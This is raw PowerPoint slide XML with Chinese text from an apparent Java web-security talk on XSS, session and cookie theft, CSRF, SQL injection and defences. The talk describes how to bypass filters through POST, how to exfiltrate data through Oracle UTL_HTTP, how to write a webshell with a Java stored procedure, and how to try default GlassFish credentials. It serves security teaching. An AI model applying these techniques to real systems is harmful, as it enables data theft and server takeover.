              <a:t>修改请求头的作用是在某些业务逻辑下程序猿需要去记录用户的请求头信息到数据库，而通过伪造的请求头一旦到了数据库可能造成xss，或者在未到数据库的时候就造成了SQL注入，因为对于程序员来说，大多数人认为一般从Headers里面取出来的数据是安全可靠的，可以放心的拼SQL(记得好像Discuz有这样一个漏洞)。今年一月份的时候我发现xss.tw也有一个这样的经典案例，Wdot那哥们在记录用户的请求头信息的时候没有去转意特殊的脚本，导致我们通过伪造的请求头直接存储到数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>看到我们用FireFox和Chrome请求同一个URL得到的SessionId并不一样，说明SessionId是唯一的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一旦Session在服务器端设置成功那么我们在此次回话当中就可以一直共享这个SessionId对应的session信息，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而session是有有效期的，一般默认在20-30分钟，你会看到xss平台往往有一个功能叫keepSession，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>每过一段时间就带着sessionId去请求一次，其实就是在保持session的有效不过期。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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这是一个典型的就是客户端发送一个HTTP请求到服务器端，服务器端接收到请求并处理、响应的一个过程。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其实JSP是Servlet的一种特殊形式，每个JSP页面就是一个Servlet实例。Servlet又是一个普通的Java类它编译后就是一个普通的class文件。</a:t>
            </a:r>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器关闭其实并不会让session失效！因为session是存储在服务器端内存当中的。客户端把浏览器关闭了服务器怎么可能知道？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正确的解释或许应该是浏览器关闭后不会去记忆关闭前客户端和服务器端之间的session信息且服务器端没有将sessionId以Cookie的方式写入到客户端缓存当中，重新打开浏览器之后并不会带着关闭之前的sessionId去访问服务器URL，服务器从请求中得不到sessionId自然给人的感觉就是session不存在（自己理解的）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当我们关闭服务器时Tomcat会在安装目录workCatalinalocalhost项目名目录下建立SESSIONS.ser文件。此文件就是Session在Tomcat停止的时候 持久化到硬盘中的文件. 所有当前访问的用户Session都存储到此文件中. Tomcat启动成功后.SESSIONS.ser  又会反序列化到内存中,所以启动成功后此文件就消失了. 所以正常情况下 从启Tomcat用户是不需要登录的. 注意有个前提，就是存储到Session里面的user对象所对应的User类必须要序列化才可以。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我要说的话都已经在图片当中的文字注释里面了，伟大的Xss黑客们看明白了吗？你盗取的也许是jsessionId(Java里面叫jsessionId)，而不只是cookie。那么假设我们的Session被设置得特别长那么这个SessionId就会长时间的保留，而为Xss攻击提供了得天独厚的条件。而这种Session长期存在会浪费服务器的内存也会导致：SessionFixation攻击！  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有些大牛级别的程序员直接把帐号密码明文存储到客户端的cookie里面去，不得不佩服其功力深厚啊。客户端直接记事本打开就能看到自己的帐号密码了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我想cookie以明文的形式存储在客户端我就不用解释了吧？文件和数据摆在面前！ 盗取cookie的最直接的方式就是xss，利用IE浏览器输出当前站点的cookie：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以非常清晰的看到通常的Jsp在项目中的地位并不如我们大多数人所想的那么重要，甚至是可有可无！因为我们完全可以用其他的东西来代替JSP作为前端展示层。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般来说直接把cookie发送给服务器服务器，程序员过度相信客户端cookie值那么我们就可以在不用知道用户名和密码的情况下登录后台，甚至是cookie注入。jsessionid也会放到cookie里面，所以拿到了cookie对应的也拿到了jsessionid，拿到了jsessionid就拿到了对应的会话当中的所有信息，而如果那个jsessionid恰好是管理员的呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从以上的例子可知，CSRF 攻击是黑客借助受害者的 cookie 骗取服务器的信任，但是黑客并不能拿到 cookie，也看不到 cookie 的内容。另外，对于服务器返回的结果，由于浏览器同源策略的限制，黑客也无法进行解析。因此，黑客无法从返回的结果中得到任何东西，他所能做的就是给服务器发送请求，以执行请求中所描述的命令，在服务器端直接改变数据的值，而非窃取服务器中的数据。所以，我们要保护的对象是那些可以直接产生数据改变的服务，而对于读取数据的服务，则不需要进行 CSRF 的保护。比如银行系统中转账的请求会直接改变账户的金额，会遭到 CSRF 攻击，需要保护。而查询余额是对金额的读取操作，不会改变数据，CSRF 攻击无法解析服务器返回的结果，无需保护。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关系:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JPA可以依靠JDBC对JDO进行对象持久化，而ORM只是JPA当中的一个规范，我们常见的Hibernate、Mybatis和TopLink什么的都是ORM的具体实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有的人可能心中有防御Sql注入意识，但是在面对复杂业务的时候可能还是存在侥幸心理，最近还是被神奇路人甲给脱裤了。为了处理未知的SQL注入攻击，一些大厂商开始采用SQL防注入甚至是使用某些厂商的WAF。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>你会发现你根本就看不懂这个class文件，因为这是字节码文件我们根本就没法看。通过我们的TOMCAT编译后他编程了一个Java类文件保存在Tomcat的work目录下。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tips:在某些场景下可能需要在参数末尾加注释符--,使用“--”的作用在于注释掉从当前代码末尾到SQL末尾的语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--在oracle和mssql都可用，mysql可以用# /**。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从Class.forName反射去加载MYSQL启动开始，到通过DriverManager去获取一个本地的连接数据库的对象。而拿到一个数据连接以后便是我们执行SQL与事物处理的过程。当我们去调用PreparedStatement的方法如：executeQuery或executeUpdate等都会通过mysql的JDBC实现对Mysql数据库做对应的操作。Java里面连接数据库的方式一般来说都是固定的格式，不同的只是实现方式。所以只要我们的项目中有加载对应数据库的jar包我们就能做相应的数据库连接。而在一个Web项目中如果/WEB-INF/lib下和对应容器的lib下只有mysql的数据库连接驱动包，那么就只能连接MYSQL了，这一点跟其他语言有点不一样，不过应该容易理解和接受，假如php.ini不开启对mysql、mssql、oracle等数据库的支持效果都一样。修复之前的SQL注入的方式显而易见了，用“？”号去占位，预编译SQL的时候会自动根据pstt里的参数去处理，从而避免SQL注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在通过conn.prepareStatement去获取一个PreparedStatement便会以预编译去处理查询SQL，而使用conn.createStatement得到的只是一个普通的Statement不会去预编译SQL语句，但Statement执行效率和速度都比prepareStatement要快前者是后者的父类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从类加载到连接的关闭数据库厂商根据自己的数据库的特性实现了JDBC的接口。类加载完成之后才能够继续调用其他的方法去获取一个连接对象，然后才能过去执行SQL命令、返回查询结果集(ResultSet)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java中的JSP里边有个特性直接request.getParameter("Parameter");去获取请求的数据是不分GET和POST的，我们的Servlet一般都是两者合一的方式去处理的，而在SpringMVC里面如果不指定传入参数的方式默认是get和post都可以接受到。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上面默认只接收GET请求，而大多数时候是很少有人去制定请求的方式的。说这么多其实就是为了告诉大家我们可以通过POST方式去绕过普通的SQL防注入检测！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>程序在接受参数后把一个字符串转换成int(整型)的时候发生异常，那么后面的代码是不会接着执行的哦，所以SQL注入也会失败。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>信任客户端的参数一切参数只匹配查询条件，把参数和条件自动装配到框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果客户端提交了危险的SQL也没有关系在query的时候是会预编译。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>依旧提交order by 去猜测显示当前页面所用的SQL查询了多少个字段，也就是确认查询字段数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不过我得告诉你，UNION SELECT查询返回的是多个结果，而在正常的业务逻辑当中我们取一条新闻是直接放到对应的实体当中的，比如我们查询的wooyun的厂商表：corps，那么我们做查询的很有可能是抽象出一个corps对象，在DAO层取得到单个的参数结果集，如果有多个要么报错，要么取出第一条。然后再到controller层把查询的结果放到请求里面。最终在输出的时候自然也就只能拿到单个的corps实体，这也是视图层只做展示把业务逻辑和视图分开的好处之一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接符我用的是-转换成编码也就是45</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上述SQL通过添加Where条件就能获取到常见注入的敏感信息，请有心学习的同学按照上面的MYSQL注入时通过information_schema获取敏感字段的方式去学习user_tab_columns和FROM User_tables表。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UTL_HTTP 会带着查询数据库的结果去请求我们的URL，也就是我注入点上写的URL。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tips：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UTL_HTTP是一条一条的去请求的，所以会跟数据库保持一个长连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>而数据量过大的话会导致数据丢失，如果想完整的友情备份这种方法并不是特别可行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>只用在浏览器上请求这个注入点Oracle会自动的把自己的裤子送上门来那种感觉非常的好。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之前的各种Oracle文章似乎都提过怎样去getshell，其实方法倒是有的。但是在Java里面你要想拿到WEB的根路径比那啥还难。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为数据库对开发语言的无关系，所以或许我们在某些场合下以下的getshell方式也是挺不错的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQLJ是一个与Java编程语言紧密集成的嵌入式SQL的版本，这里"嵌入式SQL"是用来在其宿主通用编程语言如C、C++、Java、Ada和COBOL）中调用SQL语句。SQL翻译器用SQLJ运行时库中的调用来替代嵌入式SQLJ语句，该运行时库真正实现SQL操作。这样翻译的结果是得到一个可使用任何Java翻译器进行编译的Java源程序。一旦Java源程序被编译，Java执行程序就可在任何数据库上运行。SQLJ运行环境由纯Java实现的小SQLJ运行库（小，意指其中包括少量的代码）组成，该运行时库转而调用相应数据库的JDBC驱动程序。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中的getShell是我们的方法名，p和才是参数，p是路径，而c是要写的文件内容。在创建Java存储过程的时候方法类型必须是静态的static</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>围观了下开发商后发现其用的是glassfish：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试从服务器弱口令入口了入手但是失败了glassfish的默认管理帐号是admin密码是adminadmin，如果能过登录glassfish的后台可以直接部署一个war去getshell。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于没有使用如Struts2之类的MVC框架所以google了下他的jsp，-News参数表示不希望在搜索结果中包含带有-News的结果。 ￼</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过GOOGLE找到一处flash上传点，值得注意的是在项目当中上传下载一般作为一个共有的业务，所以可能存在一致性也就是此处要是上传不成功恐怕到了后台也不会成功。企图上传shell：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>好吧支持txt.html.exe什么的先来个txt： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看页面源码后还真就发现了点猫腻有DWR框架。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DWR就是一个奇葩，人家都是想着怎么样去解耦，他倒好直接把js和后端java给耦合在一起了。DWR（Direct Web Remoting）是一个用于改善web页面与Java类交互的远程服务器端Ajax开源框架，可以帮助开发人员开发包含AJAX技术的网站。它可以允许在浏览器里的代码使用运行在WEB服务器上的JAVA方法，就像它就在浏览器里一样。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>再次利用chrome抓网络请求，居然发现后台把用户的密码都给返回了，这不科学啊： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>再次提醒普通的防注入普遍防的是GET请求，POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过去很多防注入都傻逼了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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sym typeface="+mn-ea"/>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solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="任意多边形 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7364784" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 13002"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10800"/>
              <a:gd name="connsiteX1" fmla="*/ 10059 w 13002"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10800"/>
              <a:gd name="connsiteX2" fmla="*/ 13002 w 13002"/>
              <a:gd name="connsiteY2" fmla="*/ 5399 h 10800"/>
              <a:gd name="connsiteX3" fmla="*/ 10059 w 13002"/>
              <a:gd name="connsiteY3" fmla="*/ 10800 h 10800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 13002"/>
              <a:gd name="connsiteY4" fmla="*/ 10800 h 10800"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 13002"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1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002" h="10800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10059" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13002" y="5399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10059" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="50AD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任意多边形 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857884" y="0"/>
            <a:ext cx="1798394" cy="5143500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3175"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10800"/>
              <a:gd name="connsiteX1" fmla="*/ 229 w 3175"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10800"/>
              <a:gd name="connsiteX2" fmla="*/ 3175 w 3175"/>
              <a:gd name="connsiteY2" fmla="*/ 5392 h 10800"/>
              <a:gd name="connsiteX3" fmla="*/ 314 w 3175"/>
              <a:gd name="connsiteY3" fmla="*/ 10800 h 10800"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 3175"/>
              <a:gd name="connsiteY4" fmla="*/ 10800 h 10800"/>
              <a:gd name="connsiteX5" fmla="*/ 2932 w 3175"/>
              <a:gd name="connsiteY5" fmla="*/ 5392 h 10800"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 3175"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 1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75" h="10800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="229" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3175" y="5392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932" y="5392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
